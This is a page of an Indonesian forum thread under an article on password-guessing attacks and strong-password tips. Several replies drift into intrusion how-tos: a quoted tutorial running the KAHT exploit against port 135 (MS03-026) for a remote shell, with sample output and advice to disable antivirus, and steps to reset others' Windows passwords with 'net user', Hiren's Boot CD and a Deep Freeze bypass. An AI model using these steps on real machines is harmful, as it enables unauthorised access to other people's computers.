Follow us on...
Follow us on G+ Follow us on Twitter Follow us on Facebook Watch us on YouTube
Register
Page 3 of 4 FirstFirst 1234 LastLast
Results 31 to 45 of 53
  1. mossy's Avatar
    Status
    Offline
    Member Array
    Join Date
    Apr 2008
    Location
    Jakarta, Cikarang
    Posts
    247
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0

    Jump to Comments

    Cara Membobol Password dan Solusi Menangkalnya

    52 Comments by mossy Published on 23-06-2008 20:00
    Jaman sekarang yang namanya hacker atau cracker semakin kreatif, dengan berbagai cara mereka berusaha menembus email Anda, friendster, rekening online, web site, bahkan blog.Anda tidak mau kan, kalau suatu saat profile Anda di friendster diubah oleh orang? Atau web site Anda tiba-tiba di ganti tampilannya oleh hacker / cracker ?

    Salah satu cara hacker menembus account kita adalah dengan cara menebak password. Hacker menggunakan script yang dapat memasukkan puluhan password tiap detik untuk mencoba masuk ke dalam account kita.

    Cara hacker menebak password kita antara lain dengan:

    1. Brute force attack, yaitu dengan mencoba semua kombinasi, mulai dari aaaa sampai zzzz, sampai beberapa karakter.
    2. Dictionary attack, yaitu dengan menebak menggunakan kata-kata dalam kamus, dan dikombinasikan dengan angka-angka atau karakter.
    3. Personal information attack, dengan cara memasukkan data-data pribadi seperti nomor telepon, tanggal lahir, nama pacar, kode pos, dan sebagainya.

    Password yang sangat lemah akan sangat mudah dibobol hacker dengan cara ini. Contoh password yang sangat lemah misalnya:

    * 123456, qwerty, asdf, ini karena mudah sekali orang mengetik kombinasi ini di keyboard.
    * password, mypassword, dan lain-lain yang menggunakan kata-kata dalam kamus (semua bahasa).
    * tanggal lahir, nama pacar, dan lainnya yang merupakan data diri orang tersebut.

    Password yang lemah, bisa dibobol dalam waktu yang lebih cepat, misalnya:

    * menggunakan semua huruf kecil.
    * menggunakan kombinasi kata dan angka, misalnya buku10, teroris80.
    * mengganti huruf dengan karakter, misalnya c1nt@

    Bagaimana password yang kuat dan sulit ditembus hacker?

    1. Merupakan kombinasi dari huruf besar, huruf kecil, nomor, dan karakter.
    2. Panjang lebih dari 10 karakter.
    3. Tidak menyertakan kata-kata dalam kamus.

    Password yang kuat harus mudah diingat oleh pemiliknya.

    Contoh password yang kuat: 1mAu$100Ribu

    Cara mengingatnya:

    * 1 = kata “saya” diterjemahkan dalam bahasa Inggris (I).
    * mAu = mau
    * $ = uang
    * 100Ribu = 100 ribu

    Contoh password kuat yang lain: ninG->0+1Gul

    Cara mengingatnya:

    * ninG = misalnya nama orang sepesial buat Anda: Naning
    * -> = panah identik dengan adalah
    * 0+ = lambang cewek
    * 1 =berarti nomor satu atau paling
    * Gul = gula itu manis

    Beberapa tips:

    1. Jangan menggunakan password yang sama untuk berbagai macam layanan, misalnya password email Anda sama dengan password friendster. Ini berarti:
    * seseorang yang dapat menjebol password friendster Anda, bisa juga menjebol password email Anda. Sementara di mata hacker menjebol password friendster lebih mudah daripada menjebol email Yahoo.
    * admin atau “orang dalam” friendster tahu password Anda, dia juga bisa memasukkan password tersebut ke email Anda.
    2. Jangan mengklik link di email yang menyatakan Anda harus memverifikasi password Anda. Email ini dikirim oleh hacker.
    3. Jangan memasukkan password disitus selain yang memberikan layanan. Misalnya jangan memasukkan password yahoo di situs friendster untuk alasan apapun (misalnya import address book).
    4. Sebelum login ke email atau yang lain, pastikan URL di browser Anda benar. Misalnya mail.yahoo.com bukan mail.yahoo-ltd.com atau yahoo-verify.com atau yang lain.
    5. Untuk rekening online seperti e-gold, klik BCA, paypal, sebaiknya Anda tidak mengetik password Anda lewat keyboard (karena hacker bisa membaca keyboard Anda dengan program keylogger). Gunakan On Screen Keyboard, Charakter Map, atau copy paste dari huruf acak.

    Okey begitulah tips-tips agar password kita sulit dibobol hacker. Semoga dengan tips ini account kita aman dan terhindar dari kebobolan.

    Penulis: Oka Mahendra
    Sumber :
    Click here to enlarge

  2. The Following 9 Users Say Thank You to mossy For This Useful Post:


  3. Total Comments 52

    Comments

  4. #31
    Status
    Offline
    tioo's Avatar
    Baru Gabung
    Join Date
    Nov 2009
    Location
    jakarta
    Posts
    6
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0

    Talking

    ok..mkasi atas tipsnya, smoga berguna bagi qt smua..Click here to enlarge

  5. #32
    Status
    Offline
    Akangage's Avatar
    Administrator
    Join Date
    Aug 2007
    Location
    Daerah Khusus Ibukota Jakarta, Indonesia
    Posts
    4,198
    Reviews
    Read 0 Reviews
    Downloads
    210
    Uploads
    87
    Feedback Score
    0

    kaht modar akan sedikit pusing

    kaht ga berguna jika firefal target on ,,,pa lagi deepreezzee ga ada guna nya tu kahtClick here to enlargeClick here to enlarge

  6. #33
    Status
    Offline
    Akangage's Avatar
    Administrator
    Join Date
    Aug 2007
    Location
    Daerah Khusus Ibukota Jakarta, Indonesia
    Posts
    4,198
    Reviews
    Read 0 Reviews
    Downloads
    210
    Uploads
    87
    Feedback Score
    0
    Click here to enlarge Originally Posted by racha5187 Click here to enlarge
    bole ngasi tau cara membobol password windows g nech???

    Cara membobol Password Windows

    Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol password komputer orang lain, tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
    kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.

    Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools Kaht bisa anda download disini .
    Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
    Langkahnya :
    1. Unzip file Kaht.zip
    2. Letakkan pada direktori yang anda suka.
    3. Masuk ke direktori tempat file berada melalui text mode
    4. Tentukan sasaran pc yang akan di hacking missal
    IP : 192.168.30.3
    Kaht 192.168.30.1 192.168.30.3
    Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:


    KAHT II - MASSIVE RPC EXPLOIT dst
    [+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
    [+] Attacking Port:135. Remote Shell at port:36388
    [+] Scan In Progress......
    - Connecting to 192.168.30.3
    Sending Exploit to a [Win2k] Server
    - Connectando con la Shell Remote
    dst........
    C:WINNTsystem32>

    Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai. anda bisa membuat user admin membuat sharing dll
    Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan.


    semoga bermanfaat
    kaht ga ada guna nya lo firee fall aktif pa lagi ketambahan deepreeezeee mau diapain juga ga pengaruhhh!!!!!!!!!!!!!!Click here to enlargeClick here to enlargeClick here to enlarge

  7. #34
    Status
    Offline
    ndh4y's Avatar
    Newbie
    Join Date
    Jun 2009
    Location
    tangerang scheweng
    Posts
    37
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    firefall itu firewall yh kang akang?? Click here to enlarge

  8. #35
    Status
    Offline
    cyber4rt's Avatar
    Baru Gabung
    Join Date
    Nov 2009
    Posts
    19
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlargeknp topik'a melenceng...???? Click here to enlargejadi bahaz dunia hacking...Click here to enlargeaduh - aduh Click here to enlarge

  9. #36
    Status
    Offline
    ramond's Avatar
    Newbie
    Join Date
    Jun 2009
    Posts
    43
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by info_media_perdana Click here to enlarge
    setuju banget buat password yg susahhh buanget,,,Click here to enlarge
    btw anyway and busway,,SIMALAKAMA juga buat ane,,,,gara-2 bikin pass yg susah buanget,,kejadian deh kelupaan passwd nya...makanan sehari-hari kena marah si bos,,,,Click here to enlarge
    yang buat pass masih ingt ga tuh ntar...Click here to enlarge

  10. #37
    Status
    Offline
    vzulkar's Avatar
    Newbie
    Join Date
    May 2009
    Posts
    26
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by info_media_perdana Click here to enlarge
    setuju banget buat password yg susahhh buanget,,,Click here to enlarge
    btw anyway and busway,,SIMALAKAMA juga buat ane,,,,gara-2 bikin pass yg susah buanget,,kejadian deh kelupaan passwd nya...makanan sehari-hari kena marah si bos,,,,Click here to enlarge
    laaah.. sama nih kayak pengalaman ente...
    Akhirnya dicoba pake password yang porno... mengacu kepada persetubuhan.. Click here to enlarge

    Tapiii...
    Saat saya lagi nggak masuk kantor, boss perempuan gue menelepon...
    Mas.. Cepet sembuh ya, tapi saya ada kesulitan nih. Saya butuh data di komputer kamu.. bisa minta passwordnya?

    Click here to enlarge
    Mati gue.. akhirnya setelah dieja pelan2.. si bos cantik tadi terbengong2 dan bilang singkat dengan nada tegas "kalau sudah masuk, passwordnya diganti ya!"

    Haduuh...Click here to enlarge

  11. The Following User Says Thank You to vzulkar For This Useful Post:


  12. #38
    Status
    Offline
    Spring's Avatar
    Contributor
    Join Date
    Oct 2009
    Location
    Manado
    Posts
    964
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by jacky10 Click here to enlarge
    Saat anda memasukan username dan password dalam suatu website jangan menggunakan opsi remember, atau mengaktifkan auto login saat halaman login di buka. Kemudian setelah selesai melakukan broswing bersihkan jejak/history karena dikwatirkan login dan password anda masih tersimpan di dalam cooky.Setidaknya bersihkan dengan tool utilitas bawaan windows, jika tersedia pakai utilitas dari pihak lain seperti tune up utilities dan lain sebagainya.
    gmna cara liat kalau ada service milik key logger yg sedang jalan??? apa nama service nya di processes task manager??

  13. #39
    Status
    Offline
    Spring's Avatar
    Contributor
    Join Date
    Oct 2009
    Location
    Manado
    Posts
    964
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by racha5187 Click here to enlarge
    bole ngasi tau cara membobol password windows g nech???

    Cara membobol Password Windows

    Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol password komputer orang lain, tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
    kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.

    Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools Kaht bisa anda download disini .
    Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
    Langkahnya :
    1. Unzip file Kaht.zip
    2. Letakkan pada direktori yang anda suka.
    3. Masuk ke direktori tempat file berada melalui text mode
    4. Tentukan sasaran pc yang akan di hacking missal
    IP : 192.168.30.3
    Kaht 192.168.30.1 192.168.30.3
    Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:


    KAHT II - MASSIVE RPC EXPLOIT dst
    [+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
    [+] Attacking Port:135. Remote Shell at port:36388
    [+] Scan In Progress......
    - Connecting to 192.168.30.3
    Sending Exploit to a [Win2k] Server
    - Connectando con la Shell Remote
    dst........
    C:WINNTsystem32>

    Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai. anda bisa membuat user admin membuat sharing dll
    Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan.


    semoga bermanfaat
    Kaht bisa gak di WinXP SP2???

  14. #40
    Status
    Offline
    sufandi's Avatar
    Member Senior
    Join Date
    May 2008
    Location
    permukaan bumi
    Posts
    482
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by vzulkar Click here to enlarge
    laaah.. sama nih kayak pengalaman ente...
    Akhirnya dicoba pake password yang porno... mengacu kepada persetubuhan.. Click here to enlarge

    Tapiii...
    Saat saya lagi nggak masuk kantor, boss perempuan gue menelepon...
    Mas.. Cepet sembuh ya, tapi saya ada kesulitan nih. Saya butuh data di komputer kamu.. bisa minta passwordnya?

    Click here to enlarge
    Mati gue.. akhirnya setelah dieja pelan2.. si bos cantik tadi terbengong2 dan bilang singkat dengan nada tegas "kalau sudah masuk, passwordnya diganti ya!"

    Haduuh...Click here to enlarge
    kocak banget neh...Click here to enlarge

  15. #41
    Status
    Offline
    donipermono1982's Avatar
    Moderator
    Join Date
    Feb 2008
    Location
    Samping Surga
    Posts
    2,800
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    kalau di pc target ada remote administrator tinggal telnet ke komputer target

    ketik net user ( nama user ) ( yg mau di ganti )

    jadinya begini net user administrator indo123

    kalau pake hiren lebih mudah lagi..ga ngaruh dia mau pake security apa di pc nya pasti ke reset dah tuh password Click here to enlarge

  16. #42
    Status
    Offline
    donipermono1982's Avatar
    Moderator
    Join Date
    Feb 2008
    Location
    Samping Surga
    Posts
    2,800
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    kalau mau menghindari di hack kaya gitu matikan service2 yg tidak di gunakan di windows XP

    masuk ke administratif tools > service

    pake encript folder bisa bawain mainboard atau third party dengan cara ini walau udah masuk ke folder tetep aja ga bisa masuk ke folder tsb ! paling ga memperlama kinerja hacking !


    gunakan antivirus yg support firewalling inbound outbond ( pastikan ngerti cara gunainnya Click here to enlarge ) contoh bit defender internet security

    nanti w tambahin lagi kalau semped + ss nya Click here to enlarge

  17. #43
    Status
    Offline
    CreernDem's Avatar
    Baru Gabung
    Join Date
    Dec 2009
    Location
    Italy
    Posts
    2
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0

    Looking for American Pie Beta house, where to watch it?

    Hello to all!

    Could you please tell me where can i watch online?

    Thank you in advance!

  18. #44
    Status
    Offline
    dragon-crash's Avatar
    Member
    Join Date
    Nov 2009
    Posts
    145
    Reviews
    Read 0 Reviews
    Downloads
    0
    Uploads
    0
    Feedback Score
    0
    kalau mo hack password windows,Click here to enlarge
    pake hirenboot cd aja.Click here to enlarge
    waktu saya coba inClick here to enlarge. kalau untuk seri windows nt kyak xp and vista.Click here to enlarge
    dngan cara ngebuat account baru setingkat administratorClick here to enlarge.
    terus login deh pake account yang baru dibuat tadiClick here to enlarge.
    habis logginClick here to enlarge. kalau misalnya pake deepfreezeClick here to enlarge.
    mati in deh deepfreeze pake ADFClick here to enlarge.
    (pengganti deep freeze yang masih aman bisa gunain returnil virtual system. deepfreeze gampang dibobolClick here to enlarge)

    nah, kalau udah di mati in deepfreeze nyaClick here to enlarge.
    masuk ke command prompt.
    ketikin deh net user *
    ntar kalau mo ngerubah password nya user DODOL.
    ketik net user DODOL *
    teken enter , enter, enter.
    udah slseai deh.
    Click here to enlargeClick here to enlargeClick here to enlarge

    tapi kalau ngebobol mikrotik ???Click here to enlargeClick here to enlargeClick here to enlarge
    ampun dah, .............Click here to enlargeClick here to enlarge

  19. #45
    Status
    Offline
    mzachmad's Avatar
    Baru Gabung
    Join Date
    Jun 2009
    Posts
    13
    Reviews
    Read 0 Reviews
    Downloads
    10
    Uploads
    0
    Feedback Score
    0
    Click here to enlarge Originally Posted by Dody Click here to enlarge
    Kalo tips aman pake komputer orang lain atau publik pc supaya terhindar dari keylogger gimana ??????
    Lihat di task managernya aja atau pake process explorer, kalau ada proses yang mencurigakan langsung kill aja....
    Click here to enlarge

 

 
Page 3 of 4 FirstFirst 1234 LastLast

Thread Information

Users Browsing this Thread

There are currently 3 users browsing this thread. (0 members and 3 guests)

Similar Articles

  1. Replies: 9
    Last Post: 06-05-2009, 20:18
  2. <ask> solusi terbaik untuk point 2 multipoint ?
    By Mat Soleh in forum Wireless Networking
    Replies: 6
    Last Post: 07-07-2008, 11:40
  3. Mohon Solusi
    By zulfahmi in forum General Networking
    Replies: 1
    Last Post: 19-05-2008, 20:18
  4. ada solusi untuk ini
    By parot in forum General Networking
    Replies: 13
    Last Post: 12-02-2008, 10:24
  5. Kasi Solusi Dunk
    By Boedie in forum General Networking
    Replies: 6
    Last Post: 07-01-2008, 18:13

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
ads